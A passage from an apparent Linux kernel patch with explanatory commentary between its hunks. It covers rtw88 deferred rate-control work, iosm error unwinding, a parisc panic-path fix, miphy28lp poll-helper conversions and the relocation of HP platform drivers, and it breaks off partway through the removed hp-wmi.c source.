+ 	si->init_ra_lv = 1;
+ 	ewma_rssi_init(&si->avg_rssi);
+ 	for (i = 0; i < ARRAY_SIZE(sta->txq); i++)
+ 		rtw_txq_init(rtwdev, sta->txq[i]);
++	INIT_WORK(&si->rc_work, rtw_sta_rc_work);
+ 
+ 	rtw_update_sta_info(rtwdev, si, true);
+ 	rtw_fw_media_status_report(rtwdev, si->mac_id, true);
+@@ -330,6 +343,8 @@ void rtw_sta_remove(struct rtw_dev *rtwdev, struct ieee80211_sta *sta,
+ 	struct rtw_sta_info *si = (struct rtw_sta_info *)sta->drv_priv;
+ 	int i;
+ 
++	cancel_work_sync(&si->rc_work);
++
+ 	rtw_release_macid(rtwdev, si->mac_id);
+ 	if (fw_exist)
+ 		rtw_fw_media_status_report(rtwdev, si->mac_id, false);
+diff --git a/drivers/net/wireless/realtek/rtw88/main.h b/drivers/net/wireless/realtek/rtw88/main.h
+index cd9c068ae1a78..f8714f4492440 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.h
++++ b/drivers/net/wireless/realtek/rtw88/main.h
+@@ -734,6 +734,7 @@ struct rtw_txq {
+ DECLARE_EWMA(rssi, 10, 16);
+ 
+ struct rtw_sta_info {
++	struct rtw_dev *rtwdev;
+ 	struct ieee80211_sta *sta;
+ 	struct ieee80211_vif *vif;
+ 
+@@ -758,6 +759,8 @@ struct rtw_sta_info {
+ 
+ 	bool use_cfg_mask;
+ 	struct cfg80211_bitrate_mask *mask;
++
++	struct work_struct rc_work;
+ };
+ 
+ enum rtw_bfee_role {
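
Taken together, the three rtw88 hunks move the rate-control update out of
sta_rc_update(), an atomic mac80211 callback, into a work item that may
take rtwdev->mutex. The lifecycle follows the usual deferred-work
pattern:

    /* at sta add: bind the handler */
    INIT_WORK(&si->rc_work, rtw_sta_rc_work);

    /* from the atomic callback: defer, never sleep */
    ieee80211_queue_work(rtwdev->hw, &si->rc_work);

    /* at sta remove: ensure the handler finished before freeing si */
    cancel_work_sync(&si->rc_work);
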
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_imem.c b/drivers/net/wwan/iosm/iosm_ipc_imem.c
+index 1e6a479766429..8ccd4d26b9060 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_imem.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_imem.c
+@@ -565,24 +565,32 @@ static void ipc_imem_run_state_worker(struct work_struct *instance)
+ 	struct ipc_mux_config mux_cfg;
+ 	struct iosm_imem *ipc_imem;
+ 	u8 ctrl_chl_idx = 0;
++	int ret;
+ 
+ 	ipc_imem = container_of(instance, struct iosm_imem, run_state_worker);
+ 
+ 	if (ipc_imem->phase != IPC_P_RUN) {
+ 		dev_err(ipc_imem->dev,
+ 			"Modem link down. Exit run state worker.");
+-		return;
++		goto err_out;
+ 	}
+ 
+ 	if (test_and_clear_bit(IOSM_DEVLINK_INIT, &ipc_imem->flag))
+ 		ipc_devlink_deinit(ipc_imem->ipc_devlink);
+ 
+-	if (!ipc_imem_setup_cp_mux_cap_init(ipc_imem, &mux_cfg))
+-		ipc_imem->mux = ipc_mux_init(&mux_cfg, ipc_imem);
++	ret = ipc_imem_setup_cp_mux_cap_init(ipc_imem, &mux_cfg);
++	if (ret < 0)
++		goto err_out;
++
++	ipc_imem->mux = ipc_mux_init(&mux_cfg, ipc_imem);
++	if (!ipc_imem->mux)
++		goto err_out;
++
++	ret = ipc_imem_wwan_channel_init(ipc_imem, mux_cfg.protocol);
++	if (ret < 0)
++		goto err_ipc_mux_deinit;
+ 
+-	ipc_imem_wwan_channel_init(ipc_imem, mux_cfg.protocol);
+-	if (ipc_imem->mux)
+-		ipc_imem->mux->wwan = ipc_imem->wwan;
++	ipc_imem->mux->wwan = ipc_imem->wwan;
+ 
+ 	while (ctrl_chl_idx < IPC_MEM_MAX_CHANNELS) {
+ 		if (!ipc_chnl_cfg_get(&chnl_cfg_port, ctrl_chl_idx)) {
+@@ -615,6 +623,13 @@ static void ipc_imem_run_state_worker(struct work_struct *instance)
+ 
+ 	/* Complete all memory stores after setting bit */
+ 	smp_mb__after_atomic();
++
++	return;
++
++err_ipc_mux_deinit:
++	ipc_mux_deinit(ipc_imem->mux);
++err_out:
++	ipc_uevent_send(ipc_imem->dev, UEVENT_CD_READY_LINK_DOWN);
+ }
+ 
+ static void ipc_imem_handle_irq(struct iosm_imem *ipc_imem, int irq)
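
The reworked worker turns silent partial failures into the standard
goto-unwind shape: each fallible step jumps to a label that tears down
only what was already built, and every failure path ends in a single
link-down notification. The skeleton, with hypothetical step names:

    static void bring_up(struct ctx *c)
    {
            if (setup_mux(c) < 0)           /* hypothetical */
                    goto err_out;
            if (setup_wwan(c) < 0)          /* hypothetical */
                    goto err_mux;
            return;                         /* success */

    err_mux:
            teardown_mux(c);
    err_out:
            report_link_down(c);            /* one notification path */
    }
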
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_imem_ops.c b/drivers/net/wwan/iosm/iosm_ipc_imem_ops.c
+index 66b90cc4c3460..109cf89304888 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_imem_ops.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_imem_ops.c
+@@ -77,8 +77,8 @@ out:
+ }
+ 
+ /* Initialize wwan channel */
+-void ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
+-				enum ipc_mux_protocol mux_type)
++int ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
++			       enum ipc_mux_protocol mux_type)
+ {
+ 	struct ipc_chnl_cfg chnl_cfg = { 0 };
+ 
+@@ -87,7 +87,7 @@ void ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
+ 	/* If modem version is invalid (0xffffffff), do not initialize WWAN. */
+ 	if (ipc_imem->cp_version == -1) {
+ 		dev_err(ipc_imem->dev, "invalid CP version");
+-		return;
++		return -EIO;
+ 	}
+ 
+ 	ipc_chnl_cfg_get(&chnl_cfg, ipc_imem->nr_of_channels);
+@@ -104,9 +104,13 @@ void ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
+ 
+ 	/* WWAN registration. */
+ 	ipc_imem->wwan = ipc_wwan_init(ipc_imem, ipc_imem->dev);
+-	if (!ipc_imem->wwan)
++	if (!ipc_imem->wwan) {
+ 		dev_err(ipc_imem->dev,
+ 			"failed to register the ipc_wwan interfaces");
++		return -ENOMEM;
++	}
++
++	return 0;
+ }
+ 
+ /* Map SKB to DMA for transfer */
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_imem_ops.h b/drivers/net/wwan/iosm/iosm_ipc_imem_ops.h
+index f8afb217d9e2f..026c5bd0f9992 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_imem_ops.h
++++ b/drivers/net/wwan/iosm/iosm_ipc_imem_ops.h
+@@ -91,9 +91,11 @@ int ipc_imem_sys_wwan_transmit(struct iosm_imem *ipc_imem, int if_id,
+  *				MUX.
+  * @ipc_imem:		Pointer to iosm_imem struct.
+  * @mux_type:		Type of mux protocol.
++ *
++ * Return: 0 on success or a negative error code on failure
+  */
+-void ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
+-				enum ipc_mux_protocol mux_type);
++int ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
++			       enum ipc_mux_protocol mux_type);
+ 
+ /**
+  * ipc_imem_sys_devlink_open - Open a Flash/CD Channel link to CP
+diff --git a/drivers/parisc/power.c b/drivers/parisc/power.c
+index 456776bd8ee66..6f5e5f0230d39 100644
+--- a/drivers/parisc/power.c
++++ b/drivers/parisc/power.c
+@@ -37,7 +37,6 @@
+ #include <linux/module.h>
+ #include <linux/init.h>
+ #include <linux/kernel.h>
+-#include <linux/notifier.h>
+ #include <linux/panic_notifier.h>
+ #include <linux/reboot.h>
+ #include <linux/sched/signal.h>
+@@ -175,16 +174,21 @@ static void powerfail_interrupt(int code, void *x)
+ 
+ 
+ 
+-/* parisc_panic_event() is called by the panic handler.
+- * As soon as a panic occurs, our tasklets above will not be
+- * executed any longer. This function then re-enables the 
+- * soft-power switch and allows the user to switch off the system
++/*
++ * parisc_panic_event() is called by the panic handler.
++ *
++ * As soon as a panic occurs, our tasklets above will not
++ * be executed any longer. This function then re-enables
++ * the soft-power switch and allows the user to switch off
++ * the system. We rely on pdc_soft_power_button_panic()
++ * since this version uses spin_trylock() (instead of a
++ * regular spinlock), preventing deadlocks on the panic path.
+  */
+ static int parisc_panic_event(struct notifier_block *this,
+ 		unsigned long event, void *ptr)
+ {
+ 	/* re-enable the soft-power switch */
+-	pdc_soft_power_button(0);
++	pdc_soft_power_button_panic(0);
+ 	return NOTIFY_DONE;
+ }
+ 
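
The switch to pdc_soft_power_button_panic() exists because the panicking
CPU may already hold the PDC lock; a blocking spin_lock in the notifier
would then hang the panic path forever. The general pattern, sketched
with a hypothetical firmware call:

    static DEFINE_SPINLOCK(fw_lock);

    static int panic_cb(struct notifier_block *nb, unsigned long ev,
                        void *p)
    {
            /* never block during panic: skip the call if contended */
            if (spin_trylock(&fw_lock)) {
                    fw_reenable_power_button();     /* hypothetical */
                    spin_unlock(&fw_lock);
            }
            return NOTIFY_DONE;
    }
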
+diff --git a/drivers/phy/st/phy-miphy28lp.c b/drivers/phy/st/phy-miphy28lp.c
+index 068160a34f5cc..e30305b77f0d1 100644
+--- a/drivers/phy/st/phy-miphy28lp.c
++++ b/drivers/phy/st/phy-miphy28lp.c
+@@ -9,6 +9,7 @@
+ 
+ #include <linux/platform_device.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+@@ -484,19 +485,11 @@ static inline void miphy28lp_pcie_config_gen(struct miphy28lp_phy *miphy_phy)
+ 
+ static inline int miphy28lp_wait_compensation(struct miphy28lp_phy *miphy_phy)
+ {
+-	unsigned long finish = jiffies + 5 * HZ;
+ 	u8 val;
+ 
+ 	/* Waiting for Compensation to complete */
+-	do {
+-		val = readb_relaxed(miphy_phy->base + MIPHY_COMP_FSM_6);
+-
+-		if (time_after_eq(jiffies, finish))
+-			return -EBUSY;
+-		cpu_relax();
+-	} while (!(val & COMP_DONE));
+-
+-	return 0;
++	return readb_relaxed_poll_timeout(miphy_phy->base + MIPHY_COMP_FSM_6,
++					  val, val & COMP_DONE, 1, 5 * USEC_PER_SEC);
+ }
+ 
+ 
+@@ -805,7 +798,6 @@ static inline void miphy28lp_configure_usb3(struct miphy28lp_phy *miphy_phy)
+ 
+ static inline int miphy_is_ready(struct miphy28lp_phy *miphy_phy)
+ {
+-	unsigned long finish = jiffies + 5 * HZ;
+ 	u8 mask = HFC_PLL | HFC_RDY;
+ 	u8 val;
+ 
+@@ -816,21 +808,14 @@ static inline int miphy_is_ready(struct miphy28lp_phy *miphy_phy)
+ 	if (miphy_phy->type == PHY_TYPE_SATA)
+ 		mask |= PHY_RDY;
+ 
+-	do {
+-		val = readb_relaxed(miphy_phy->base + MIPHY_STATUS_1);
+-		if ((val & mask) != mask)
+-			cpu_relax();
+-		else
+-			return 0;
+-	} while (!time_after_eq(jiffies, finish));
+-
+-	return -EBUSY;
++	return readb_relaxed_poll_timeout(miphy_phy->base + MIPHY_STATUS_1,
++					  val, (val & mask) == mask, 1,
++					  5 * USEC_PER_SEC);
+ }
+ 
+ static int miphy_osc_is_ready(struct miphy28lp_phy *miphy_phy)
+ {
+ 	struct miphy28lp_dev *miphy_dev = miphy_phy->phydev;
+-	unsigned long finish = jiffies + 5 * HZ;
+ 	u32 val;
+ 
+ 	if (!miphy_phy->osc_rdy)
+@@ -839,17 +824,10 @@ static int miphy_osc_is_ready(struct miphy28lp_phy *miphy_phy)
+ 	if (!miphy_phy->syscfg_reg[SYSCFG_STATUS])
+ 		return -EINVAL;
+ 
+-	do {
+-		regmap_read(miphy_dev->regmap,
+-				miphy_phy->syscfg_reg[SYSCFG_STATUS], &val);
+-
+-		if ((val & MIPHY_OSC_RDY) != MIPHY_OSC_RDY)
+-			cpu_relax();
+-		else
+-			return 0;
+-	} while (!time_after_eq(jiffies, finish));
+-
+-	return -EBUSY;
++	return regmap_read_poll_timeout(miphy_dev->regmap,
++					miphy_phy->syscfg_reg[SYSCFG_STATUS],
++					val, val & MIPHY_OSC_RDY, 1,
++					5 * USEC_PER_SEC);
+ }
+ 
+ static int miphy28lp_get_resource_byname(struct device_node *child,
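
All three conversions replace the same hand-rolled jiffies loop with the
generic poll helpers (readb_relaxed_poll_timeout() from <linux/iopoll.h>,
regmap_read_poll_timeout() from <linux/regmap.h>): poll every 1 us, give
up after 5 s, succeed as soon as the condition holds. The calling
convention, with placeholder STATUS_REG/READY_BIT:

    u8 val;
    int ret;

    ret = readb_relaxed_poll_timeout(base + STATUS_REG, /* address   */
                                     val,               /* read into */
                                     val & READY_BIT,   /* done when */
                                     1,                 /* delay, us */
                                     5 * USEC_PER_SEC); /* timeout   */
    /* ret is 0 on success, -ETIMEDOUT if the bit never came up */
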
+diff --git a/drivers/platform/x86/Kconfig b/drivers/platform/x86/Kconfig
+index b02a8125bc7d5..1396a839dd8a4 100644
+--- a/drivers/platform/x86/Kconfig
++++ b/drivers/platform/x86/Kconfig
+@@ -424,24 +424,7 @@ config GPD_POCKET_FAN
+ 	  of the CPU temperature. Say Y or M if the kernel may be used on a
+ 	  GPD pocket.
+ 
+-config HP_ACCEL
+-	tristate "HP laptop accelerometer"
+-	depends on INPUT && ACPI
+-	depends on SERIO_I8042
+-	select SENSORS_LIS3LV02D
+-	select NEW_LEDS
+-	select LEDS_CLASS
+-	help
+-	  This driver provides support for the "Mobile Data Protection System 3D"
+-	  or "3D DriveGuard" feature of HP laptops. On such systems the driver
+-	  should load automatically (via ACPI alias).
+-
+-	  Support for a led indicating disk protection will be provided as
+-	  hp::hddprotect. For more information on the feature, refer to
+-	  Documentation/misc-devices/lis3lv02d.rst.
+-
+-	  To compile this driver as a module, choose M here: the module will
+-	  be called hp_accel.
++source "drivers/platform/x86/hp/Kconfig"
+ 
+ config WIRELESS_HOTKEY
+ 	tristate "Wireless hotkey button"
+@@ -455,30 +438,6 @@ config WIRELESS_HOTKEY
+ 	 To compile this driver as a module, choose M here: the module will
+ 	 be called wireless-hotkey.
+ 
+-config HP_WMI
+-	tristate "HP WMI extras"
+-	depends on ACPI_WMI
+-	depends on INPUT
+-	depends on RFKILL || RFKILL = n
+-	select INPUT_SPARSEKMAP
+-	select ACPI_PLATFORM_PROFILE
+-	select HWMON
+-	help
+-	 Say Y here if you want to support WMI-based hotkeys on HP laptops and
+-	 to read data from WMI such as docking or ambient light sensor state.
+-
+-	 To compile this driver as a module, choose M here: the module will
+-	 be called hp-wmi.
+-
+-config TC1100_WMI
+-	tristate "HP Compaq TC1100 Tablet WMI Extras"
+-	depends on !X86_64
+-	depends on ACPI
+-	depends on ACPI_WMI
+-	help
+-	  This is a driver for the WMI extensions (wireless and bluetooth power
+-	  control) of the HP Compaq TC1100 tablet.
+-
+ config IBM_RTL
+ 	tristate "Device driver to enable PRTL support"
+ 	depends on PCI
+diff --git a/drivers/platform/x86/Makefile b/drivers/platform/x86/Makefile
+index 5a428caa654a7..1d3d1b02541b9 100644
+--- a/drivers/platform/x86/Makefile
++++ b/drivers/platform/x86/Makefile
+@@ -55,9 +55,7 @@ obj-$(CONFIG_FUJITSU_TABLET)	+= fujitsu-tablet.o
+ obj-$(CONFIG_GPD_POCKET_FAN)	+= gpd-pocket-fan.o
+ 
+ # Hewlett Packard
+-obj-$(CONFIG_HP_ACCEL)		+= hp_accel.o
+-obj-$(CONFIG_HP_WMI)		+= hp-wmi.o
+-obj-$(CONFIG_TC1100_WMI)	+= tc1100-wmi.o
++obj-$(CONFIG_X86_PLATFORM_DRIVERS_HP)	+= hp/
+ 
+ # Hewlett Packard Enterprise
+ obj-$(CONFIG_UV_SYSFS)       += uv_sysfs.o
+diff --git a/drivers/platform/x86/hp-wmi.c b/drivers/platform/x86/hp-wmi.c
+deleted file mode 100644
+index 4a3851332ef2c..0000000000000
+--- a/drivers/platform/x86/hp-wmi.c
++++ /dev/null
+@@ -1,1570 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * HP WMI hotkeys
+- *
+- * Copyright (C) 2008 Red Hat <mjg@redhat.com>
+- * Copyright (C) 2010, 2011 Anssi Hannula <anssi.hannula@iki.fi>
+- *
+- * Portions based on wistron_btns.c:
+- * Copyright (C) 2005 Miloslav Trmac <mitr@volny.cz>
+- * Copyright (C) 2005 Bernhard Rosenkraenzer <bero@arklinux.org>
+- * Copyright (C) 2005 Dmitry Torokhov <dtor@mail.ru>
+- */
+-
+-#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+-
+-#include <linux/kernel.h>
+-#include <linux/module.h>
+-#include <linux/init.h>
+-#include <linux/slab.h>
+-#include <linux/types.h>
+-#include <linux/input.h>
+-#include <linux/input/sparse-keymap.h>
+-#include <linux/platform_device.h>
+-#include <linux/platform_profile.h>
+-#include <linux/hwmon.h>
+-#include <linux/acpi.h>
+-#include <linux/rfkill.h>
+-#include <linux/string.h>
+-#include <linux/dmi.h>
+-
+-MODULE_AUTHOR("Matthew Garrett <mjg59@srcf.ucam.org>");
+-MODULE_DESCRIPTION("HP laptop WMI hotkeys driver");
+-MODULE_LICENSE("GPL");
+-
+-MODULE_ALIAS("wmi:95F24279-4D7B-4334-9387-ACCDC67EF61C");
+-MODULE_ALIAS("wmi:5FB7F034-2C63-45e9-BE91-3D44E2C707E4");
+-
+-#define HPWMI_EVENT_GUID "95F24279-4D7B-4334-9387-ACCDC67EF61C"
+-#define HPWMI_BIOS_GUID "5FB7F034-2C63-45e9-BE91-3D44E2C707E4"
+-#define HP_OMEN_EC_THERMAL_PROFILE_OFFSET 0x95
+-#define zero_if_sup(tmp) (zero_insize_support?0:sizeof(tmp)) // use when zero insize is required
+-
+-/* DMI board names of devices that should use the omen specific path for
+- * thermal profiles.
+- * This was obtained by taking a look in the windows omen command center
+- * app and parsing a json file that they use to figure out what capabilities
+- * the device should have.
+- * A device is considered an omen if the DisplayName in that list contains
+- * "OMEN", and it can use the thermal profile stuff if the "Feature" array
+- * contains "PerformanceControl".
+- */
+-static const char * const omen_thermal_profile_boards[] = {
+-	"84DA", "84DB", "84DC", "8574", "8575", "860A", "87B5", "8572", "8573",
+-	"8600", "8601", "8602", "8605", "8606", "8607", "8746", "8747", "8749",
+-	"874A", "8603", "8604", "8748", "886B", "886C", "878A", "878B", "878C",
+-	"88C8", "88CB", "8786", "8787", "8788", "88D1", "88D2", "88F4", "88FD",
+-	"88F5", "88F6", "88F7", "88FE", "88FF", "8900", "8901", "8902", "8912",
+-	"8917", "8918", "8949", "894A", "89EB"
+-};
+-
+-/* DMI Board names of Omen laptops that are specifically set to be thermal
+- * profile version 0 by the Omen Command Center app, regardless of what
+- * the get system design information WMI call returns
+- */
+-static const char *const omen_thermal_profile_force_v0_boards[] = {
+-	"8607", "8746", "8747", "8749", "874A", "8748"
+-};
+-
+-enum hp_wmi_radio {
+-	HPWMI_WIFI	= 0x0,
+-	HPWMI_BLUETOOTH	= 0x1,
+-	HPWMI_WWAN	= 0x2,
+-	HPWMI_GPS	= 0x3,
+-};
+-
+-enum hp_wmi_event_ids {
+-	HPWMI_DOCK_EVENT		= 0x01,
+-	HPWMI_PARK_HDD			= 0x02,
+-	HPWMI_SMART_ADAPTER		= 0x03,
+-	HPWMI_BEZEL_BUTTON		= 0x04,
+-	HPWMI_WIRELESS			= 0x05,
+-	HPWMI_CPU_BATTERY_THROTTLE	= 0x06,
+-	HPWMI_LOCK_SWITCH		= 0x07,
+-	HPWMI_LID_SWITCH		= 0x08,
+-	HPWMI_SCREEN_ROTATION		= 0x09,
+-	HPWMI_COOLSENSE_SYSTEM_MOBILE	= 0x0A,
+-	HPWMI_COOLSENSE_SYSTEM_HOT	= 0x0B,
+-	HPWMI_PROXIMITY_SENSOR		= 0x0C,
+-	HPWMI_BACKLIT_KB_BRIGHTNESS	= 0x0D,
+-	HPWMI_PEAKSHIFT_PERIOD		= 0x0F,
+-	HPWMI_BATTERY_CHARGE_PERIOD	= 0x10,
+-	HPWMI_SANITIZATION_MODE		= 0x17,
+-	HPWMI_OMEN_KEY			= 0x1D,
+-	HPWMI_SMART_EXPERIENCE_APP	= 0x21,
+-};
+-
+-/*
+- * struct bios_args buffer is dynamically allocated.  New WMI command types
+- * were introduced that exceed the 128-byte data size.  Changes to handle
+- * the data size allocation scheme were kept in the hp_wmi_perform_query function.
+- */
+-struct bios_args {
+-	u32 signature;
+-	u32 command;
+-	u32 commandtype;
+-	u32 datasize;
+-	u8 data[];
+-};
+-
+-enum hp_wmi_commandtype {
+-	HPWMI_DISPLAY_QUERY		= 0x01,
+-	HPWMI_HDDTEMP_QUERY		= 0x02,
+-	HPWMI_ALS_QUERY			= 0x03,
+-	HPWMI_HARDWARE_QUERY		= 0x04,
+-	HPWMI_WIRELESS_QUERY		= 0x05,
+-	HPWMI_BATTERY_QUERY		= 0x07,
+-	HPWMI_BIOS_QUERY		= 0x09,
+-	HPWMI_FEATURE_QUERY		= 0x0b,
+-	HPWMI_HOTKEY_QUERY		= 0x0c,
+-	HPWMI_FEATURE2_QUERY		= 0x0d,
+-	HPWMI_WIRELESS2_QUERY		= 0x1b,
+-	HPWMI_POSTCODEERROR_QUERY	= 0x2a,
+-	HPWMI_SYSTEM_DEVICE_MODE	= 0x40,
+-	HPWMI_THERMAL_PROFILE_QUERY	= 0x4c,
+-};
+-
+-enum hp_wmi_gm_commandtype {
+-	HPWMI_FAN_SPEED_GET_QUERY = 0x11,
+-	HPWMI_SET_PERFORMANCE_MODE = 0x1A,
+-	HPWMI_FAN_SPEED_MAX_GET_QUERY = 0x26,
+-	HPWMI_FAN_SPEED_MAX_SET_QUERY = 0x27,
+-	HPWMI_GET_SYSTEM_DESIGN_DATA = 0x28,
+-};
+-
+-enum hp_wmi_command {
+-	HPWMI_READ	= 0x01,
+-	HPWMI_WRITE	= 0x02,
+-	HPWMI_ODM	= 0x03,
+-	HPWMI_GM	= 0x20008,
+-};
+-
+-enum hp_wmi_hardware_mask {
+-	HPWMI_DOCK_MASK		= 0x01,
+-	HPWMI_TABLET_MASK	= 0x04,
+-};
+-
+-struct bios_return {
+-	u32 sigpass;
+-	u32 return_code;
+-};
+-
+-enum hp_return_value {
+-	HPWMI_RET_WRONG_SIGNATURE	= 0x02,
+-	HPWMI_RET_UNKNOWN_COMMAND	= 0x03,
+-	HPWMI_RET_UNKNOWN_CMDTYPE	= 0x04,
+-	HPWMI_RET_INVALID_PARAMETERS	= 0x05,
+-};
+-
+-enum hp_wireless2_bits {
+-	HPWMI_POWER_STATE	= 0x01,
+-	HPWMI_POWER_SOFT	= 0x02,
+-	HPWMI_POWER_BIOS	= 0x04,
+-	HPWMI_POWER_HARD	= 0x08,
+-	HPWMI_POWER_FW_OR_HW	= HPWMI_POWER_BIOS | HPWMI_POWER_HARD,
+-};
+-
+-enum hp_thermal_profile_omen_v0 {
+-	HP_OMEN_V0_THERMAL_PROFILE_DEFAULT     = 0x00,
+-	HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE = 0x01,
+-	HP_OMEN_V0_THERMAL_PROFILE_COOL        = 0x02,
+-};
+-
+-enum hp_thermal_profile_omen_v1 {
+-	HP_OMEN_V1_THERMAL_PROFILE_DEFAULT	= 0x30,
+-	HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE	= 0x31,
+-	HP_OMEN_V1_THERMAL_PROFILE_COOL		= 0x50,
+-};
+-
+-enum hp_thermal_profile {
+-	HP_THERMAL_PROFILE_PERFORMANCE	= 0x00,
+-	HP_THERMAL_PROFILE_DEFAULT		= 0x01,
+-	HP_THERMAL_PROFILE_COOL			= 0x02,
+-	HP_THERMAL_PROFILE_QUIET		= 0x03,
+-};
+-
+-#define IS_HWBLOCKED(x) ((x & HPWMI_POWER_FW_OR_HW) != HPWMI_POWER_FW_OR_HW)
+-#define IS_SWBLOCKED(x) !(x & HPWMI_POWER_SOFT)
+-
+-struct bios_rfkill2_device_state {
+-	u8 radio_type;
+-	u8 bus_type;
+-	u16 vendor_id;
+-	u16 product_id;
+-	u16 subsys_vendor_id;
+-	u16 subsys_product_id;
+-	u8 rfkill_id;
+-	u8 power;
+-	u8 unknown[4];
+-};
+-
+-/* 7 devices fit into the 128 byte buffer */
+-#define HPWMI_MAX_RFKILL2_DEVICES	7
+-
+-struct bios_rfkill2_state {
+-	u8 unknown[7];
+-	u8 count;
+-	u8 pad[8];
+-	struct bios_rfkill2_device_state device[HPWMI_MAX_RFKILL2_DEVICES];
+-};
+-
+-static const struct key_entry hp_wmi_keymap[] = {
+-	{ KE_KEY, 0x02,    { KEY_BRIGHTNESSUP } },
+-	{ KE_KEY, 0x03,    { KEY_BRIGHTNESSDOWN } },
+-	{ KE_KEY, 0x20e6,  { KEY_PROG1 } },
+-	{ KE_KEY, 0x20e8,  { KEY_MEDIA } },
+-	{ KE_KEY, 0x2142,  { KEY_MEDIA } },
+-	{ KE_KEY, 0x213b,  { KEY_INFO } },
+-	{ KE_KEY, 0x2169,  { KEY_ROTATE_DISPLAY } },
+-	{ KE_KEY, 0x216a,  { KEY_SETUP } },
+-	{ KE_KEY, 0x21a5,  { KEY_PROG2 } }, /* HP Omen Key */
+-	{ KE_KEY, 0x21a7,  { KEY_FN_ESC } },
+-	{ KE_KEY, 0x21a9,  { KEY_TOUCHPAD_OFF } },
+-	{ KE_KEY, 0x121a9, { KEY_TOUCHPAD_ON } },
+-	{ KE_KEY, 0x231b,  { KEY_HELP } },
+-	{ KE_END, 0 }
+-};
+-
+-static struct input_dev *hp_wmi_input_dev;
+-static struct platform_device *hp_wmi_platform_dev;
+-static struct platform_profile_handler platform_profile_handler;
+-static bool platform_profile_support;
+-static bool zero_insize_support;
+-
+-static struct rfkill *wifi_rfkill;
+-static struct rfkill *bluetooth_rfkill;
+-static struct rfkill *wwan_rfkill;
+-
+-struct rfkill2_device {
+-	u8 id;
+-	int num;
+-	struct rfkill *rfkill;
+-};
+-
+-static int rfkill2_count;
+-static struct rfkill2_device rfkill2[HPWMI_MAX_RFKILL2_DEVICES];
+-
+-/*
+- * Chassis Types values were obtained from SMBIOS reference
+- * specification version 3.00. A complete list of system enclosures
+- * and chassis types is available on Table 17.
+- */
+-static const char * const tablet_chassis_types[] = {
+-	"30", /* Tablet*/
+-	"31", /* Convertible */
+-	"32"  /* Detachable */
+-};
+-
+-#define DEVICE_MODE_TABLET	0x06
+-
+-/* map output size to the corresponding WMI method id */
+-static inline int encode_outsize_for_pvsz(int outsize)
+-{
+-	if (outsize > 4096)
+-		return -EINVAL;
+-	if (outsize > 1024)
+-		return 5;
+-	if (outsize > 128)
+-		return 4;
+-	if (outsize > 4)
+-		return 3;
+-	if (outsize > 0)
+-		return 2;
+-	return 1;
+-}
+-
+-/*
+- * hp_wmi_perform_query
+- *
+- * query:	The commandtype (enum hp_wmi_commandtype)
+- * write:	The command (enum hp_wmi_command)
+- * buffer:	Buffer used as input and/or output
+- * insize:	Size of input buffer
+- * outsize:	Size of output buffer
+- *
+- * returns zero on success
+- *         an HP WMI query specific error code (which is positive)
+- *         -EINVAL if the query was not successful at all
+- *         -EINVAL if the output buffer size exceeds buffersize
+- *
+- * Note: The buffersize must at least be the maximum of the input and output
+- *       size. E.g. Battery info query is defined to have 1 byte input
+- *       and 128 byte output. The caller would do:
+- *       buffer = kzalloc(128, GFP_KERNEL);
+- *       ret = hp_wmi_perform_query(HPWMI_BATTERY_QUERY, HPWMI_READ, buffer, 1, 128)
+- */
+-static int hp_wmi_perform_query(int query, enum hp_wmi_command command,
+-				void *buffer, int insize, int outsize)
+-{
+-	struct acpi_buffer input, output = { ACPI_ALLOCATE_BUFFER, NULL };
+-	struct bios_return *bios_return;
+-	union acpi_object *obj = NULL;
+-	struct bios_args *args = NULL;
+-	int mid, actual_insize, actual_outsize;
+-	size_t bios_args_size;
+-	int ret;
+-
+-	mid = encode_outsize_for_pvsz(outsize);
+-	if (WARN_ON(mid < 0))
+-		return mid;
+-
+-	actual_insize = max(insize, 128);
+-	bios_args_size = struct_size(args, data, actual_insize);
+-	args = kmalloc(bios_args_size, GFP_KERNEL);
+-	if (!args)
+-		return -ENOMEM;
+-
+-	input.length = bios_args_size;
+-	input.pointer = args;
+-
+-	args->signature = 0x55434553;
+-	args->command = command;
+-	args->commandtype = query;
+-	args->datasize = insize;
+-	memcpy(args->data, buffer, flex_array_size(args, data, insize));
+-
+-	ret = wmi_evaluate_method(HPWMI_BIOS_GUID, 0, mid, &input, &output);
+-	if (ret)
+-		goto out_free;
+-
+-	obj = output.pointer;
+-	if (!obj) {
+-		ret = -EINVAL;
+-		goto out_free;
+-	}
+-
+-	if (obj->type != ACPI_TYPE_BUFFER) {
+-		pr_warn("query 0x%x returned an invalid object 0x%x\n", query, ret);
+-		ret = -EINVAL;
+-		goto out_free;
+-	}
+-
+-	bios_return = (struct bios_return *)obj->buffer.pointer;
+-	ret = bios_return->return_code;
+-
+-	if (ret) {
+-		if (ret != HPWMI_RET_UNKNOWN_COMMAND &&
+-		    ret != HPWMI_RET_UNKNOWN_CMDTYPE)
+-			pr_warn("query 0x%x returned error 0x%x\n", query, ret);
+-		goto out_free;
+-	}
+-
+-	/* Ignore output data of zero size */
+-	if (!outsize)
+-		goto out_free;
+-
+-	actual_outsize = min(outsize, (int)(obj->buffer.length - sizeof(*bios_return)));
+-	memcpy(buffer, obj->buffer.pointer + sizeof(*bios_return), actual_outsize);
+-	memset(buffer + actual_outsize, 0, outsize - actual_outsize);
+-
+-out_free:
+-	kfree(obj);
+-	kfree(args);
+-	return ret;
+-}
+-
+-static int hp_wmi_get_fan_speed(int fan)
+-{
+-	u8 fsh, fsl;
